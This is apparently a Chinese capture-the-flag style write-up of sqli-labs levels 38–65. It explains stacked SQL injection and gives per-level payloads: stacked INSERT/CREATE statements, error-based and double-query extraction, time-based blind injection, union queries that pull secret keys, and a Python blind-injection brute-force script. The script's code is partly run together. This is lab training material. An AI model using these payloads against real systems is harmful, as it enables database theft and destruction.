知識點(diǎn)：

1.堆疊注入原理（stacked injection）

在SQL中，分號（;）是用來表示一條sql語句的結(jié)束。試想一下我們在 ; 結(jié)束一個sql語句后繼續(xù)構(gòu)造下一條語句，會不會一起執(zhí)行？因此這個想法也就造就了堆疊注入。
1.1與union查詢區(qū)別

而union injection（聯(lián)合注入）也是將兩條語句合并在一起，兩者之間有什么區(qū)別么？區(qū)別就在于union 或者union all執(zhí)行的語句類型是有限的，可以用來執(zhí)行查詢語句，而堆疊注入可以執(zhí)行的是任意的語句。
1.2使用實(shí)例

例如以下這個例子。用戶輸入：1; DELETE FROM products服務(wù)器端生成的sql語句為：（因未對輸入的參數(shù)進(jìn)行過濾）Select * from products where productid=1;DELETE FROM products當(dāng)執(zhí)行查詢后，第一條顯示查詢信息，第二條則將整個表進(jìn)行刪除。
1.3使用條件

堆疊注入的使用條件十分有限，其可能受到API或者數(shù)據(jù)庫引擎，又或者權(quán)限的限制只有當(dāng)調(diào)用數(shù)據(jù)庫函數(shù)支持執(zhí)行多條sql語句時才能夠使用，利用mysqli_multi_query()函數(shù)就支持多條sql語句同時執(zhí)行，但實(shí)際情況中，如PHP為了防止sql注入機(jī)制，往往使用調(diào)用數(shù)據(jù)庫的函數(shù)是mysqli_ query()函數(shù)，其只能執(zhí)行一條語句，分號后面的內(nèi)容將不會被執(zhí)行。

大多數(shù)時候，因?yàn)锳PI或數(shù)據(jù)庫引擎的不支持，堆疊注入都無法實(shí)現(xiàn)。

less38：

堆疊注入：也就是可以執(zhí)行多條sql語句

http://127.0.0.1/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

less39 堆疊注入

語句都一樣，重點(diǎn)是找到閉合的方式
?id=1;insert into users(id,username,password) values (16,‘a(chǎn)’,‘a(chǎn)’)–+

less40盲注，字符型

?id=1'); insert into users(id,username,password) values ('17','a','a')--+

less41 盲注，數(shù)字型

1; insert into users(id,username,password) values(18,'b','b') --+

less42

經(jīng)過驗(yàn)證，在password處語句報錯，所以我們需要從passowrd入手

0';create table aaa like users #

less43

和 42 類似 同樣password 未過濾

login_user=1&login_password=a’);create table less43 like users#&mysubmit=Login

less44 POST - Error based - String - Stacked -Blind

login_user=a&login_password=a';insert into users(id,username,password) values(19,'a','a') --+&mysubmit=Login

less45- Error based - String - Stacked - Blind

login_user=a&login_password=a’); insert into users(id,username,password) values(20,’‘c’,‘c’) --+&mysubmit=Login

Less-46 ORDER BY-Error-Numeric

終于迎來了一個過渡
這次的注入是通過order by 來進(jìn)行的
通過sort 查詢 發(fā)現(xiàn)當(dāng)輸入4的時候報錯，而報錯提示與order by 提示相同，猜想可能是將輸入的值插入order by里進(jìn)行的
通過updatexml 報錯注入

sort=4 and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23

Less-47 ORDER BY Clause-Error-Single quote

和46有少許區(qū)別，做到這里基本套路應(yīng)該都懂了，從不需要單引號，雙引號之類的報錯，到盲注，難度都是一步一步深入
sort=4’ and (select count(*) from information_schema.columns group by concat(0x7e,(select database()),0x7e,floor(rand(0)*2))) --+
注意 and后面的語句要使用（）括起來
基于 procedure analyse 注入

sort=1'procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

Less-48 ORDER BY Clause Blind based

這一題 需要使用盲注解決
通過substr獲取所要查詢的信息的位數(shù)
然后使用ascii去解析成ascii編碼
之后通過if判斷是否相等 去獲取值
之后構(gòu)成 if(ascii(substr(datbase(),1,1)))

或者使用rand(ascii(left(database,1))=115) 同樣獲取相同的效果

Less-49 ORDER BY Clause Blind based

同樣是盲注，和48類似
這一題使用延時盲注解決
獲取長度

?id=1 and if(length(database())=8,sleep(5),0)--+

獲取值

?id=1 and If(ascii(substr(database(),1,1))=114,0,sleep (5))--+

Less-50 ORDER BY Clause Blind based

檢測 返回只有正確或者錯誤，屬于盲注

通過報錯注入 也能獲取

id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

Less-51 ORDER BY Clause Blind based

sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

Less-52 ORDER BY Clause Blind based

測試發(fā)現(xiàn)均沒有顯錯 只能盲注了

1 and if(length(database())=8,sleep(5),0) --+

Less - 53 ORDER BY Clause Blind based

通過測試發(fā)現(xiàn)回顯只有正確和錯誤，所以這道題做法基本就是盲注了，

id=4' and if(length(database()) = 8 ,0,sleep(6)) --+ id=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1 id=1' and (ascii(substr((select database()) ,1,1))) = 114 and if(1=1, sleep(1), n

Less-54 GET-challenge-Union-10 queries allowed-Variation 1

挑戰(zhàn) ，允許查詢10次，先不急去查看，觀察一下需要輸入的內(nèi)容
所以，我們只有10次機(jī)會，
一般獲取一個表正常需要獲取數(shù)據(jù)庫，到表，到列，再到數(shù)據(jù)，所以最少需要4步，而這里我們需要用6步猜測出來注入
回憶一下前面的注入， get類型的包含但不限于單引號，雙引號，bool，堆疊，延時，報錯，字符型和數(shù)字型，雙注。

第一道題 采用最簡單的’注入

?id=1%27%20order%20by%203%20%23 // True ?id=1%27%20order%20by%204%20%23 // false ?id=0%27%20union%20select%201,2,database()%20%23 // True challenges ?id=0%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20%23 // True 8T3YRE3TXR ?id=0%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%278T3YRE3TXR%27%20%23// true secret_4XCQ ?id=0%27%20union%20select%201,2,group_concat(s

Less-55 GET-challenge-Union-14 queries allowed-Variation 2

線索： 告訴了測試次數(shù)14次， union測試 數(shù)據(jù)庫challenges
第一次挑戰(zhàn) 失敗
’ " ') ") 均沒有回顯 初次猜測報錯注入或者雙注
第二次嘗試
) 閉合
獲取表

=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' %23 // True UBU4QNRHHP

獲取列

id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='UBU4QNRHHP' %23 //true // secret_6H3B

獲取key

0) union select 1,2,group_concat(secret_6H3B) from UBU4QNRHHP %23 mLjAsOZnSEbQqIMybw1AnUYH

Less-56 GET-challenge-Union-14 queries allowed-Variation 3

這次老老實(shí)實(shí)繞過

id=1' %23 // False id=1" %23 // True 但是注入 union報錯

添加為

id=1' union select 1,2,3 %23 // False id=1" union select 1,2,3 %23 //False id=1') union select 1,2,3 %23

獲取表

0%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23 KOUNR4QC6G

獲取列

0') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='KOUNR4QC6G'%23 secret_3EVD

獲取key

0') union select 1,2,group_concat(secret_3EVD) from KOUNR4QC6G %23 KcU87wBerjRPTHsvWBL6Zpx1

Less-57 GET-challenge-Union-14 queries allowed-Variation 4

做法 和之前一樣
0" union select 1,2,3 %23
通過改變0之后的值達(dá)到閉合的目的

獲取表

0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'%23 VAFBXAV18O

獲取列

0" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='VAFBXAV18O'%23 secret_G8PM

獲取key

0" union select 1,2,group_concat(secret_G8PM) from VAFBXAV18O %23 dRwHUUQ2TXSGUZ556g7FikFJ

Less-58 GET-challenge-Double Query-5 queries allowed-Variation 1

這道題 不看題目可能需要測好久
這次使用雙注來報錯查詢

?id=1%27and%20%271%27=%271 // True繞過

獲取表

1'and (select count(*) from information_schema.tables group by concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~',floor(rand(0)*2))) %23 5H512U9U27

獲取列

1'and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='5H512U9U27' limit 2,1),'~',floor(rand(0)*2))) %23 secret_DD13

獲取key

1'and (select count(*) from information_schema.tables group by concat('~',(select secret_BJYY from 9JMRBSMHB3 limit 0,1),'~',floor(rand(0)*2))) %23 fJw5d5MfwbirBtiV6ajyMVYL

Less-59 GET-challenge-Double Query-5 queries allowed-Variation 2

先測試類型
有報錯，可以注入
這次不需要過濾
獲取表

1 and (select count(*) from information_schema.tables group by concat('~',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'~',floor(rand(0)*2))) %23 N6JFY84247

獲取列

1 and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database() and table_name='N6JFY84247' limit 2,1),'~',floor(rand(0)*2))) %23 secret_FWQ3

獲取key

1 and (select count(*) from information_schema.tables group by concat('~',(select secret_FWQ3 from N6JFY84247 limit 0,1),'~',floor(rand(0)*2))) %23 VlWMK389WVuIephCe46vDls5

Less-60 GET-challenge-Double Query-5 queries allowed-Variation 3

測試 單引號 雙引號 ) ') “) 發(fā)現(xiàn)”) 閉合 繞過

獲取表

?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),%27~%27,floor(rand(0)*2)))%20%23 5H36JXB2F0

獲取 列

?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%275H36JXB2F0%27%20limit%202,1),%27~%27,floor(rand(0)*2)))%20%23 secret_NFL6

獲取key

?id=1%22)%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20secret_NFL6%20from%205H36JXB2F0%20limit%200,1),%27~%27,floor(rand(0)*2)))%20%23 49DYkkaArpuMaYb5ITI6NYlP

Less-61 GET-challenge-Double Query-5 queries allowed-Variation 4

通過1’ 判斷閉合

獲取表

1% 27))%20and%20(select%20count(*)%20from%20information_schema.tables%20group%20by%20concat(%27~%27,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),%27~%27,floor(rand(0)*2)))%20%23

EKP9EVPEDH
獲取列

1')) and (select count(*) from information_schema.tables group by concat('~',(select column_name from information_schema.columns where table_schema=database()%20 and table_name='EKP9EVPEDH' limit 2,1),'~',floor(rand(0)*2))) %23 secret_DI64

獲取key

1')) and (select count(*) from information_schema.tables group by concat('~',(select secret_DI64 from EKP9EVPEDH ),'~',floor(rand(0)*2))) %23 8r5XPen1KywllEINiQfAQnlq

Less-62 GET-challenge-Blind- 130 queries allowed -variation 1

高能警告，大佬腳本：

## 這里通過 ') %23 可構(gòu)成閉合from urllib import request from urllib import parse import reurl ='http://192.168.64.135/Less-62/?id='# length num = 0 for i in range(1,20):num +=1param = '1 \') and (length(database())='+str(i)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()if (re.search("Angelina",response)):print("length:" + str(i))breakdatabase = "" for i in range(10):a = b =64while True:num +=1b = int(b/2)param = '1 \') and (ascii(substr(database(),'+str(i+1)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()#print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr(database(),' + str(i+1) + ',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()#print(url + parse.quote(param))if (re.search("Angelina", response)):database +=chr(a)breakelse:a +=bprint(database)之后爆破表 這一題寫個完整的，之后就簡略的寫出注入點(diǎn)， 爆破表，拿上面的修修改改 通過檢查，先確定表的長度，再去爆破 爆破前記得重置，因?yàn)?span id="ozvdkddzhkzd" class="token number">130次比較少 # 查表的數(shù)量 table_num = 0while True:param = "1 ') and (select count(*) from information_schema.tables where table_schema=database())="+str(table_num)+" #"response = request.urlopen(url + parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina",response)):print("table_num:"+str(table_num))breakelse:table_num += 1 print(table_num)# # 確定表的長度 table_length = 0 while True:param = '1 \') and length(substr((select table_name from information_schema.tables where table_schema=database()),1))='+str(table_length)+' #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):print("table_num:" + str(table_length))breakelse:table_length += 1# 獲取表名 table_name="" for i in range(1,11):a=b=64while True:b= int(b/2)param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_schema=database()),'+str(i)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_schema=database()),'+str(i)+',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()print(url + parse.quote(param))if (re.search("Angelina", response)):table_name +=chr(a)breakelse:a +=bprint(table_name)J8CLO25SRR最后查列，這里發(fā)現(xiàn)寫的腳本比較費(fèi)時，所以稍微修改一下 column_name ="" for i in range(7,11):a=b=64while True:b= int(b/2)param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_name="'+str(table_name)+'"),'+str(i)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr((select table_name from information_schema.tables where table_name="'+str(table_name)+'"),'+str(i)+',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()print(url + parse.quote(param))if (re.search("Angelina", response)):column_name +=chr(a)breakelse:a +=b #HKIR print(column_name) column_name = "secret_"+column_name# 查 key for i in range(1,25):a=b=64while True:b= int(b/2)param = '1 \') and (ascii(substr((select '+column_name+' from '+table_name+'),'+str(i)+',1))<'+str(a)+') #'response = request.urlopen(url+parse.quote(param)).read().decode()print(url+parse.quote(param))if (re.search("Angelina", response)):a -=belse:param = '1 \') and (ascii(substr((select '+column_name+' from '+table_name+')),'+str(i)+',1))=' + str(a) + ') #'response = request.urlopen(url + parse.quote(param)).read().decode()print(url + parse.quote(param))if (re.search("Angelina", response)):key +=chr(a)breakelse:a +=b

Less-63 GET-challenge-Blind- 130 queries allowed -variation 2

和上一題類似
這里就判斷注入類型，和如何閉合
1’ order by 4 %23
通過判斷 發(fā)現(xiàn)3 返回正常 4 錯誤
所以之后的做法就和62 一樣

Less-64 GET-challenge-Blind- 130 queries allowed -variation 3

測試了 ’ " ) )) ') ") ')) "))
1)) order by 3 %23 閉合

Less-65 GET-challenge-Blind- 130 queries allowed -variation 4

和上一題一樣，通過測試閉合
發(fā)現(xiàn) ") 繞過 閉合
這里還有一種做法，將需要繞過的寫入txt文件，之后通過burp去爆破，通過判斷返回值也可以達(dá)到相同的

總結(jié)

以上是生活随笔為你收集整理的sqli-lab——Writeup（38~over）堆叠等......的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。